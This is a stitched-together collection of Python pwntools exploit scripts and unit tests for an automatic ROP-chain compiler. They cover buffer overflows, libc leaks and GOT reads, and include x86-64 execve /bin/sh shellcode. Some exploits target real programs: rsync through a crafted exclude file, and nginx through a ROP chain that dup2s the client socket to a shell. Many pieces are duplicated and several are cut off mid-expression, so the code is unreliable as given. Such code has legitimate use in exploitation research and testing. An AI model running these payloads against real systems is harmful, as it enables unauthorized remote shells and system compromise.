def test_leak_overflowx86(self):
filename = e('leak_overflow')
libc, libc_gadgets = e('libc.so'), e('libc.gadgets')
os.environ[
'LD_PRELOAD'] = libc # Ensure we use the libc that we've pulled gadgets from
p = process([filename])
p.writeline("1")
p.readuntil("what address would you like to peek at?\n")
p.writeline("0x804a010") # leak address of fgets
fgets_addr = int(p.readline().split(":")[1].strip(), 16)
libc_address = fgets_addr - ELF(libc).symbols['fgets']
goals = [["function", "system", "/bin/sh"]]
files = [(filename, None, 0), (libc, libc_gadgets, libc_address)]
rop = ropme.rop(files, [libc],
goals,
arch=archinfo.ArchX86(),
log_level=logging.DEBUG)
p.writeline("2")
p.writeline('A' * 272 + rop)
p.writeline("3")
self.check_shell(p)
def do_test_bof_read_got(self, filename):
p = process([filename,'3000'])
files = [(filename, None, 0)]
rop = ropme.rop(files, ["/lib/x86_64-linux-gnu/libc.so.6"], [["shellcode_hex", binascii.hexlify(self.shellcode_amd64())]], log_level = logging.DEBUG)
payload = 'A'*512 + ('B'*8) + rop
p.writeline(payload)
p.readline()
self.check_shell(p)
def test_bof_read_got_x86(self):
filename = e('bof_read_got_x86')
p = process([filename,'3000'])
files = [(filename, None, 0)]
rop = ropme.rop(files, ["/lib/i386-linux-gnu/libc.so.6"], [["shellcode_hex", binascii.hexlify(self.shellcode_x86())]], arch = archinfo.ArchX86(), log_level = logging.DEBUG)
payload = 'A'*512 + ('B'*16) + rop
p.writeline(payload)
p.readline()
self.check_shell(p)
def test_bof_shell(self):
filename = e('bof_shell')
files = [(filename, None, 0)]
rop = ropme.rop(files, [], [["shellcode_hex", binascii.hexlify(self.shellcode_amd64())]], log_level = logging.DEBUG)
payload = 'A'*512 + 'B'*8 + rop
p = process([filename,'3000'])
p.writeline(payload)
p.readline()
self.check_shell(p)
def do_test_bof_read_got(self, filename):
p = process([filename, '3000'])
files = [(filename, None, 0)]
rop = ropme.rop(
files, ["/lib/x86_64-linux-gnu/libc.so.6"],
[["shellcode_hex",
binascii.hexlify(self.shellcode_amd64())]],
log_level=logging.DEBUG)
payload = 'A' * 512 + ('B' * 8) + rop
p.writeline(payload)
p.readline()
self.check_shell(p)
def test_gets(self):
bad_bytes = '\n'
filename = e('gets')
p = process([filename])
files = [(filename, None, 0)]
goals = [ ["function", "system", "/bin/sh"] ]
rop = ropme.rop(files, [], goals, log_level = logging.DEBUG, bad_bytes = bad_bytes)
self.assertFalse(self.contains_bad_bytes(rop, bad_bytes), "Bad bytes found in ROP payload for {} exploit".format(filename))
payload = 'A'*512 + ('B'*8) + rop
p.writeline(payload)
p.readline()
self.check_shell(p)
def test_strcpy(self):
bad_bytes = '\0'
filename = e('strcpy')
p = process([filename])
files = [(filename, None, 0)]
goals = [["shellcode_hex", binascii.hexlify(self.shellcode_x86())]]
rop = ropme.rop(files, [], goals, log_level = logging.DEBUG, bad_bytes = bad_bytes)
self.assertFalse(self.contains_bad_bytes(rop, bad_bytes), "Bad bytes found in ROP payload for {} exploit".format(filename))
payload = 'A'*512 + ('B'*8) + rop
p.writeline(payload)
p.readline()
self.check_shell(p)
def test_bof_shell(self):
filename = e('bof_shell')
files = [(filename, None, 0)]
rop = ropme.rop(
files, [],
[["shellcode_hex",
binascii.hexlify(self.shellcode_amd64())]],
log_level=logging.DEBUG)
payload = 'A' * 512 + 'B' * 8 + rop
p = process([filename, '3000'])
p.writeline(payload)
p.readline()
self.check_shell(p)
def test_bof_read_got_x86(self):
filename = e('bof_read_got_x86')
p = process([filename, '3000'])
files = [(filename, None, 0)]
rop = ropme.rop(
files, ["/lib/i386-linux-gnu/libc.so.6"],
[["shellcode_hex",
binascii.hexlify(self.shellcode_x86())]],
arch=archinfo.ArchX86(),
log_level=logging.DEBUG)
payload = 'A' * 512 + ('B' * 16) + rop
p.writeline(payload)
p.readline()
self.check_shell(p)
def bof_many_args(self, is_64bit):
if is_64bit:
filename, arch = e('bof_many_args'), archinfo.ArchAMD64()
else:
filename, arch = e('bof_many_args_x86'), archinfo.ArchX86()
files = [(filename, None, 0)]
rop = ropme.rop(files, [], [["function", "callme", 11,12,13,14,15,16,17,18]], arch = arch, log_level = logging.DEBUG)
if is_64bit:
payload = 'A'*512 + 'B'*8 + rop
else:
payload = 'A'*524 + 'B'*4 + rop
p = process([filename,'3000'])
p.writeline(payload)
self.assertEqual('Called with (11,12,13,14,15,16,17,18)', p.readline().strip())
p.close()
def test_bof_system(self):
filename = e('bof_system2')
files = [(filename, None, 0)]
rop = ropme.rop(files, [], [["function", "system", "uname -a\x00"], ["function", "exit", 33]], log_level = logging.DEBUG)
payload = 'A'*512 + 'B'*8 + rop
p = process([filename,'3000'])
p.writeline(payload)
actual = p.readline().strip()
p.close()
uname = process(['uname','-a'])
expected = uname.readline().strip()
uname.close()
self.assertEqual(expected, actual)
def test_bof_execve(self):
filename = e('bof_execve')
bof_execve = process([filename, '3000']) # start the program
p = remote('localhost', 2222)
files = [(filename, None, 0)]
goals = [["function", "dup2", 4, 0], ["function", "dup2", 4, 1],
["function", "dup2", 4, 2], ["execve", "/bin/sh"]]
rop = ropme.rop(files, [], goals, log_level=logging.DEBUG)
payload = 'A' * 512 + 'B' * 8 + rop
payload += ((700 - len(payload)) * 'B')
payload += "JEFF" # To end our input
p.write(payload)
p.read(8)
self.check_shell(p)
bof_execve.close()
def test_bof_system(self):
filename = e('bof_system2')
files = [(filename, None, 0)]
rop = ropme.rop(
files, [],
[["function", "system", "uname -a\x00"], ["function", "exit", 33]],
log_level=logging.DEBUG)
payload = 'A' * 512 + 'B' * 8 + rop
p = process([filename, '3000'])
p.writeline(payload)
actual = p.readline().strip()
p.close()
uname = process(['uname', '-a'])
expected = uname.readline().strip()
uname.close()
self.assertEqual(expected, actual)
def test_gets(self):
bad_bytes = '\n'
filename = e('gets')
p = process([filename])
files = [(filename, None, 0)]
goals = [["function", "system", "/bin/sh"]]
rop = ropme.rop(files, [],
goals,
log_level=logging.DEBUG,
bad_bytes=bad_bytes)
self.assertFalse(
self.contains_bad_bytes(rop, bad_bytes),
"Bad bytes found in ROP payload for {} exploit".format(filename))
payload = 'A' * 512 + ('B' * 8) + rop
p.writeline(payload)
p.readline()
self.check_shell(p)
def test_strcpy(self):
bad_bytes = '\0'
filename = e('strcpy')
p = process([filename])
files = [(filename, None, 0)]
goals = [["shellcode_hex", binascii.hexlify(self.shellcode_x86())]]
rop = ropme.rop(files, [],
goals,
log_level=logging.DEBUG,
bad_bytes=bad_bytes)
self.assertFalse(
self.contains_bad_bytes(rop, bad_bytes),
"Bad bytes found in ROP payload for {} exploit".format(filename))
payload = 'A' * 512 + ('B' * 8) + rop
p.writeline(payload)
p.readline()
self.check_shell(p)
def bof_many_args(self, is_64bit):
if is_64bit:
filename, arch = e('bof_many_args'), archinfo.ArchAMD64()
else:
filename, arch = e('bof_many_args_x86'), archinfo.ArchX86()
files = [(filename, None, 0)]
rop = ropme.rop(
files, [],
[["function", "callme", 11, 12, 13, 14, 15, 16, 17, 18]],
arch=arch,
log_level=logging.DEBUG)
if is_64bit:
payload = 'A' * 512 + 'B' * 8 + rop
else:
payload = 'A' * 524 + 'B' * 4 + rop
p = process([filename, '3000'])
p.writeline(payload)
self.assertEqual('Called with (11,12,13,14,15,16,17,18)',
p.readline().strip())
p.close()
def test_leak_overflowx86(self):
filename = e('leak_overflow')
libc, libc_gadgets = e('libc.so'), e('libc.gadgets')
os.environ['LD_PRELOAD'] = libc # Ensure we use the libc that we've pulled gadgets from
p = process([filename])
p.writeline("1")
p.readuntil("what address would you like to peek at?\n")
p.writeline("0x804a010") # leak address of fgets
fgets_addr = int(p.readline().split(":")[1].strip(), 16)
libc_address = fgets_addr - ELF(libc).symbols['fgets']
goals = [ ["function", "system", "/bin/sh"] ]
files = [(filename, None, 0), (libc, libc_gadgets, libc_address)]
rop = ropme.rop(files, [libc], goals, arch = archinfo.ArchX86(), log_level = logging.DEBUG)
p.writeline("2")
p.writeline('A'*272 + rop)
p.writeline("3")
self.check_shell(p)
def test_bof_execve(self):
filename = e('bof_execve')
bof_execve = process([filename,'3000']) # start the program
p = remote('localhost', 2222)
files = [(filename, None, 0)]
goals = [
["function", "dup2", 4, 0],
["function", "dup2", 4, 1],
["function", "dup2", 4, 2],
["execve", "/bin/sh"]
]
rop = ropme.rop(files, [], goals, log_level = logging.DEBUG)
payload = 'A'*512 + 'B'*8 + rop
payload += ((700 - len(payload)) * 'B')
payload += "JEFF" # To end our input
p.write(payload)
p.read(8)
self.check_shell(p)
bof_execve.close()
import sys, logging
import archinfo
from pwn import *
from rop_compiler import ropme
filename = './arm_bof_execve'
p = remote('localhost', 2222)
print "Using automatically built ROP chain"
files = [(filename, None, 0)]
goals = [
["function", "dup2", 4, 0],
["function", "dup2", 4, 1],
["function", "dup2", 4, 2],
["execve", "/bin/sh"]
]
rop = ropme.rop(files, [], goals, archinfo.ArchARM(), log_level = logging.DEBUG)
payload = 'A'*512 + 'B'*4 + rop
payload += ((700 - len(payload)) * 'B')
payload += "JEFF" # To end our input
with open("/tmp/rop", "w") as f: f.write(rop)
with open("/tmp/payload", "w") as f: f.write(payload)
p.writeline(payload)
p.interactive()
import sys, logging
from pwn import *
from rop_compiler import ropme, goal
filename = './bof_system2'
print "Using automatically built ROP chain"
files = [(filename, None, 0)]
rop = ropme.rop(files, [], [["function", "system", "uname -a\x00"], ["function", "exit", 33]], log_level = logging.DEBUG)
payload = 'A'*512 + 'B'*8 + rop
with open("/tmp/rop", "w") as f: f.write(rop)
with open("/tmp/payload", "w") as f: f.write(payload)
print 'Calling system("uname -a") in the target'
p = process([filename,'3000'])
#gdb.attach(p, "set disassembly-flavor intel\nbreak *0x400742\nbreak *system\nbreak *exit")
p.writeline(payload)
print "\n%s\n" % p.readline()
from rop_compiler import ropme
filename = './leak_overflow'
libc = 'libc.so'
p = process([filename])
gdb.attach(p, "set disassembly-flavor intel\nbreak *main+133")
p.writeline("1")
p.readuntil("what address would you like to peek at?\n")
p.writeline("0x804a010") # leak address of fgets
fgets_addr = int(p.readline().split(":")[1].strip(), 16)
libc_address = fgets_addr - ELF(libc).symbols['fgets']
goals = [["function", "system", "/bin/sh"]]
files = [(filename, None, 0), (libc, 'libc.gadgets', libc_address)]
rop = ropme.rop(files, [libc],
goals,
arch=archinfo.ArchX86(),
log_level=logging.DEBUG)
payload = 'A' * 272 + rop
with open("/tmp/rop", "w") as f:
f.write(rop)
with open("/tmp/payload", "w") as f:
f.write(payload)
p.writeline("2")
p.writeline(payload)
p.writeline("3")
p.interactive()
filename = './rsync'
files = [(filename, './rsync.gadgets', 0)]
shellcode = ( # http://shell-storm.org/shellcode/files/shellcode-603.php
"\x48\x31\xd2" # xor %rdx, %rdx
+ "\x48\x31\xc0" # xor %rax, %rax
+ "\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68" # mov $0x68732f6e69622f2f, %rbx
+ "\x48\xc1\xeb\x08" # shr $0x8, %rbx
+ "\x53" # push %rbx
+ "\x48\x89\xe7" # mov %rsp, %rdi
+ "\x50" # push %rax
+ "\x57" # push %rdi
+ "\x48\x89\xe6" # mov %rsp, %rsi
+ "\xb0\x3b" # mov $0x3b, %al
+ "\x0f\x05" # syscall
)
print "Finding gadgets and generating rop chain"
goals = [["shellcode_hex", binascii.hexlify(shellcode)]]
rop = ropme.rop(files, ["/lib/x86_64-linux-gnu/libc.so.6"], goals, archinfo.ArchAMD64(), logging.DEBUG)
payload = ("A" * 5696) + "J"*8 + rop
with open("/tmp/rop", "w") as f: f.write(rop)
with open("/tmp/payload", "w") as f: f.write(payload)
print "Starting rsync with the exploit payload"
p = process(argv = [filename, '-r', '--exclude-from=/tmp/payload', '.', '/tmp/to/'], executable = filename)
#gdb.attach(p, "set disassembly-flavor intel\nbreak *mprotect\n")
p.interactive()
import sys, logging
from pwn import *
import archinfo
from rop_compiler import ropme, goal
is_64bit = not (len(sys.argv) > 1 and sys.argv[1].lower() == "x86")
if is_64bit:
filename, arch = './bof_many_args', archinfo.ArchAMD64()
else:
filename, arch = './bof_many_args_x86', archinfo.ArchX86()
files = [(filename, None, 0)]
rop = ropme.rop(files, [], [["function", "callme", 11,12,13,14,15,16,17,18]], arch = arch, log_level = logging.DEBUG)
if is_64bit:
payload = 'A'*512 + 'B'*8 + rop
else:
payload = 'A'*524 + 'B'*4 + rop
with open("/tmp/rop", "w") as f: f.write(rop)
with open("/tmp/payload", "w") as f: f.write(payload)
p = process([filename,'3000'])
if "debug" in sys.argv:
if is_64bit:
gdb.attach(p, "set disassembly-flavor intel\nbreak *0x400731\nbreak callme\n") # 64-bit
else:
gdb.attach(p, "set disassembly-flavor intel\nbreak *0x080485ec\nbreak callme\n") # 32-bit
+ "\x48\x31\xc0" # xor %rax, %rax
+
"\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68" # mov $0x68732f6e69622f2f, %rbx
+ "\x48\xc1\xeb\x08" # shr $0x8, %rbx
+ "\x53" # push %rbx
+ "\x48\x89\xe7" # mov %rsp, %rdi
+ "\x50" # push %rax
+ "\x57" # push %rdi
+ "\x48\x89\xe6" # mov %rsp, %rsi
+ "\xb0\x3b" # mov $0x3b, %al
+ "\x0f\x05" # syscall
)
print "Finding gadgets and generating rop chain"
goals = [["shellcode_hex", binascii.hexlify(shellcode)]]
rop = ropme.rop(files, ["/lib/x86_64-linux-gnu/libc.so.6"], goals,
archinfo.ArchAMD64(), logging.DEBUG)
payload = ("A" * 5696) + "J" * 8 + rop
with open("/tmp/rop", "w") as f:
f.write(rop)
with open("/tmp/payload", "w") as f:
f.write(payload)
print "Starting rsync with the exploit payload"
p = process(
argv=[filename, '-r', '--exclude-from=/tmp/payload', '.', '/tmp/to/'],
executable=filename)
#gdb.attach(p, "set disassembly-flavor intel\nbreak *mprotect\n")
p.interactive()
finder.FILTER_FUNC = filter_gadgets
filename = './bof_shell'
p = process([filename,'3000'])
#gdb.attach(p, "set disassembly-flavor intel\nbreak *0x40064f\nbreak *mprotect\nbreak *0x4006da")
shellcode = ( # http://shell-storm.org/shellcode/files/shellcode-603.php
"\x48\x31\xd2" # xor %rdx, %rdx
+ "\x48\x31\xc0" # xor %rax, %rax
+ "\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68" # mov $0x68732f6e69622f2f, %rbx
+ "\x48\xc1\xeb\x08" # shr $0x8, %rbx
+ "\x53" # push %rbx
+ "\x48\x89\xe7" # mov %rsp, %rdi
+ "\x50" # push %rax
+ "\x57" # push %rdi
+ "\x48\x89\xe6" # mov %rsp, %rsi
+ "\xb0\x3b" # mov $0x3b, %al
+ "\x0f\x05" # syscall
)
files = [(filename, None, 0)]
rop = ropme.rop(files, [], [["shellcode_hex", binascii.hexlify(shellcode)]], log_level = logging.DEBUG)
payload = 'A'*512 + 'B'*8 + rop
with open("/tmp/rop", "w") as f: f.write(rop)
with open("/tmp/payload", "w") as f: f.write(payload)
p.writeline(payload)
p.interactive()
filename = './bof_execve'
process([filename,'3000'])
p = remote('localhost', 2222)
#p = process([filename,'3000'])
#gdb.attach(p, "set disassembly-flavor intel")
print "Using automatically built ROP chain"
files = [(filename, None, 0)]
goals = [
["function", "dup2", 4, 0],
["function", "dup2", 4, 1],
["function", "dup2", 4, 2],
["execve", "/bin/sh"]
]
rop = ropme.rop(files, [], goals, log_level = logging.DEBUG)
payload = 'A'*512 + 'B'*8 + rop
payload += ((700 - len(payload)) * 'B')
payload += "JEFF" # To end our input
with open("/tmp/rop", "w") as f: f.write(rop)
with open("/tmp/payload", "w") as f: f.write(payload)
print 'Calling dup2 and execve in the target'
p.write(payload)
p.interactive()
import sys, logging, struct
from pwn import *
from rop_compiler import ropme, goal, gadget
files = [('./nginx', './nginx.gadgets', 0)] # Use stored gadgets file for quicker generation
goals = [
["function", "dup2", 7, 0], # socket fd 7 = client socket
["function", "dup2", 7, 1], # socket fd 7 = client socket
["function", "dup2", 7, 2], # socket fd 7 = client socket
["execve", "/bin/sh"]
]
rop = ropme.rop(files, [], goals, log_level = logging.DEBUG, strategy = gadget.FIRST)
# The exploit causes the 3rd overwritten qword to get corrupted, skip past it
skip_24_bytes_gadget = struct.pack("Q", 0x4035b2)
payload = "\x00" + (1063 * "A") + skip_24_bytes_gadget + ("B" * 8) + ("C" * 8)
payload += rop
# Setup a server to listen for nginx's connection
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server.bind(("0.0.0.0", 12345))
server.listen(1)
client, address = server.accept()
# Once it connects, send it our payload
r = remote.fromsocket(client)
r.write(payload)
r.close()
if len(sys.argv) > 1:
filename, arch = './bof_read_got2', archinfo.ArchAMD64()
p = process([filename,'3000'])
#gdb.attach(p, "set disassembly-flavor intel\nbreak *mprotect\nbreak *0x400677")
shellcode = ( # http://shell-storm.org/shellcode/files/shellcode-603.php
"\x48\x31\xd2" # xor %rdx, %rdx
+ "\x48\x31\xc0" # xor %rax, %rax
+ "\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68" # mov $0x68732f6e69622f2f, %rbx
+ "\x48\xc1\xeb\x08" # shr $0x8, %rbx
+ "\x53" # push %rbx
+ "\x48\x89\xe7" # mov %rsp, %rdi
+ "\x50" # push %rax
+ "\x57" # push %rdi
+ "\x48\x89\xe6" # mov %rsp, %rsi
+ "\xb0\x3b" # mov $0x3b, %al
+ "\x0f\x05" # syscall
)
files = [(filename, None, 0)]
libs = ["/lib/x86_64-linux-gnu/libc.so.6"]
rop = ropme.rop(files, libs, [["shellcode_hex", binascii.hexlify(shellcode)]], arch = arch, log_level = logging.DEBUG)
payload = 'A'*512 + 'B'*8 + rop
with open("/tmp/rop", "w") as f: f.write(rop)
with open("/tmp/payload", "w") as f: f.write(payload)
p.writeline(payload)
p.interactive()
import sys, logging
from pwn import *
from rop_compiler import ropme, goal
filename = './bof_system'
p = process([filename, '3000'])
#gdb.attach(p, "set disassembly-flavor intel\nbreak *0x40067f\nbreak *system\nbreak *exit")
print "Using automatically built ROP chain"
files = [(filename, None, 0)]
uname_a_address = 0x400810 # address of the string "uname -a"
rop = ropme.rop(
files, [],
[["function", "system", uname_a_address], ["function", "exit", 33]],
log_level=logging.DEBUG)
payload = 'A' * 512 + 'B' * 8 + rop
with open("/tmp/rop", "w") as f:
f.write(rop)
with open("/tmp/payload", "w") as f:
f.write(payload)
print 'Calling system("uname -a") in the target'
p.readline()
p.writeline(payload)
print "\n%s\n" % p.readline()
import sys, logging, binascii, os
import archinfo
from pwn import *
from rop_compiler import ropme
filename = './strcpy'
libc, libc_gadgets = "libc.so", "libc.gadgets"
# Make sure we get the right libc
env = dict(os.environ)
env["LD_PRELOAD"] = env['PWD'] + "/" + libc
elf = ELF(libc)
p = process([filename], env = env)
gdb.attach(p, "set disassembly-flavor intel\nbreak *0x0804865d\n")
libc_address = int(p.readline().split(":")[1].strip(), 16) - elf.symbols["puts"]
files = [(filename, None, 0), (libc, libc_gadgets, libc_address)]
libraries = [libc]
rop = ropme.rop(files, libraries, [["execve", "/bin/sh"]], arch = archinfo.ArchX86(), log_level = logging.DEBUG, bad_bytes = "\x00")
payload = 'A'*512 + 'B'*20 + rop
with open("/tmp/rop", "w") as f: f.write(rop)
with open("/tmp/payload", "w") as f: f.write(payload)
p.writeline(payload)
p.interactive()
import sys, logging
from pwn import *
from rop_compiler import ropme, goal
filename = './bof_execve'
process([filename, '3000'])
p = remote('localhost', 2222)
#p = process([filename,'3000'])
#gdb.attach(p, "set disassembly-flavor intel")
print "Using automatically built ROP chain"
files = [(filename, None, 0)]
goals = [["function", "dup2", 4, 0], ["function", "dup2", 4, 1],
["function", "dup2", 4, 2], ["execve", "/bin/sh"]]
rop = ropme.rop(files, [], goals, log_level=logging.DEBUG)
payload = 'A' * 512 + 'B' * 8 + rop
payload += ((700 - len(payload)) * 'B')
payload += "JEFF" # To end our input
with open("/tmp/rop", "w") as f:
f.write(rop)
with open("/tmp/payload", "w") as f:
f.write(payload)
print 'Calling dup2 and execve in the target'
p.write(payload)
p.interactive()
import sys, logging
from pwn import *
from rop_compiler import ropme, goal
filename = './bof_system'
p = process([filename,'3000'])
#gdb.attach(p, "set disassembly-flavor intel\nbreak *0x40067f\nbreak *system\nbreak *exit")
print "Using automatically built ROP chain"
files = [(filename, None, 0)]
uname_a_address = 0x400810 # address of the string "uname -a"
rop = ropme.rop(files, [], [["function", "system", uname_a_address], ["function", "exit", 33]], log_level = logging.DEBUG)
payload = 'A'*512 + 'B'*8 + rop
with open("/tmp/rop", "w") as f: f.write(rop)
with open("/tmp/payload", "w") as f: f.write(payload)
print 'Calling system("uname -a") in the target'
p.readline()
p.writeline(payload)
print "\n%s\n" % p.readline()
shellcode = ( # http://shell-storm.org/shellcode/files/shellcode-603.php
"\x48\x31\xd2" # xor %rdx, %rdx
+ "\x48\x31\xc0" # xor %rax, %rax
+
"\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68" # mov $0x68732f6e69622f2f, %rbx
+ "\x48\xc1\xeb\x08" # shr $0x8, %rbx
+ "\x53" # push %rbx
+ "\x48\x89\xe7" # mov %rsp, %rdi
+ "\x50" # push %rax
+ "\x57" # push %rdi
+ "\x48\x89\xe6" # mov %rsp, %rsi
+ "\xb0\x3b" # mov $0x3b, %al
+ "\x0f\x05" # syscall
)
ropchain = ropme.rop(
[files], [],
[["shellcode_hex", binascii.hexlify(shellcode)]],
log_level=logging.DEBUG)
#ropchain = open("b28_rop4", "r").read()
######################################################################################
# Calculate the values to ensure the free call doesn't crash #########################
######################################################################################
# Variables:
# value = we write in two dwords
# value_lower = lower dword of value
# value_higher = upper dword of value
# ptr = free pointer we write in our overflow
# :binop: = add, subtract, divide, multiply
# result = the result of value_lower :binop: value_higher
import sys, logging
import archinfo
from pwn import *
from rop_compiler import ropme
filename = './arm_bof_execve'
p = remote('localhost', 2222)
print "Using automatically built ROP chain"
files = [(filename, None, 0)]
goals = [["function", "dup2", 4, 0], ["function", "dup2", 4, 1],
["function", "dup2", 4, 2], ["execve", "/bin/sh"]]
rop = ropme.rop(files, [], goals, archinfo.ArchARM(), log_level=logging.DEBUG)
payload = 'A' * 512 + 'B' * 4 + rop
payload += ((700 - len(payload)) * 'B')
payload += "JEFF" # To end our input
with open("/tmp/rop", "w") as f:
f.write(rop)
with open("/tmp/payload", "w") as f:
f.write(payload)
p.writeline(payload)
p.interactive()
filename = './strcpy'
libc, libc_gadgets = "libc.so", "libc.gadgets"
# Make sure we get the right libc
env = dict(os.environ)
env["LD_PRELOAD"] = env['PWD'] + "/" + libc
elf = ELF(libc)
p = process([filename], env=env)
gdb.attach(p, "set disassembly-flavor intel\nbreak *0x0804865d\n")
libc_address = int(p.readline().split(":")[1].strip(),
16) - elf.symbols["puts"]
files = [(filename, None, 0), (libc, libc_gadgets, libc_address)]
libraries = [libc]
rop = ropme.rop(files,
libraries, [["execve", "/bin/sh"]],
arch=archinfo.ArchX86(),
log_level=logging.DEBUG,
bad_bytes="\x00")
payload = 'A' * 512 + 'B' * 20 + rop
with open("/tmp/rop", "w") as f:
f.write(rop)
with open("/tmp/payload", "w") as f:
f.write(payload)
p.writeline(payload)
p.interactive()
import binascii
from pwn import *
from rop_compiler import ropme
shellcode = ( # http://shell-storm.org/shellcode/files/shellcode-603.php
"\x48\x31\xd2" # xor %rdx, %rdx
+ "\x48\x31\xc0" # xor %rax, %rax
+ "\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68" # mov $0x68732f6e69622f2f, %rbx
+ "\x48\xc1\xeb\x08" # shr $0x8, %rbx
+ "\x53" # push %rbx
+ "\x48\x89\xe7" # mov %rsp, %rdi
+ "\x50" # push %rax
+ "\x57" # push %rdi
+ "\x48\x89\xe6" # mov %rsp, %rsi
+ "\xb0\x3b" # mov $0x3b, %al
+ "\x0f\x05" # syscall
)
filename = './rsync'
files = [(filename, './rsync.gadgets', 0)]
goals = [["shellcode_hex", binascii.hexlify(shellcode)]]
rop = ropme.rop(files, ["/lib/x86_64-linux-gnu/libc.so.6"], goals)
payload = ("A" * 5696) + "J"*8 + rop
with open("/tmp/payload", "w") as f: f.write(payload)
p = process(argv = [filename, '-r', '--exclude-from=/tmp/payload', '.', '/tmp/to/'], executable = filename)
p.interactive()
import sys, logging, binascii
import archinfo
from pwn import *
from rop_compiler import ropme
filename = './leak_overflow'
libc = 'libc.so'
p = process([filename])
gdb.attach(p, "set disassembly-flavor intel\nbreak *main+133")
p.writeline("1")
p.readuntil("what address would you like to peek at?\n")
p.writeline("0x804a010") # leak address of fgets
fgets_addr = int(p.readline().split(":")[1].strip(), 16)
libc_address = fgets_addr - ELF(libc).symbols['fgets']
goals = [ ["function", "system", "/bin/sh"] ]
files = [(filename, None, 0), (libc, 'libc.gadgets', libc_address)]
rop = ropme.rop(files, [libc], goals, arch = archinfo.ArchX86(), log_level = logging.DEBUG)
payload = 'A'*272 + rop
with open("/tmp/rop", "w") as f: f.write(rop)
with open("/tmp/payload", "w") as f: f.write(payload)
p.writeline("2")
p.writeline(payload)
p.writeline("3")
p.interactive()
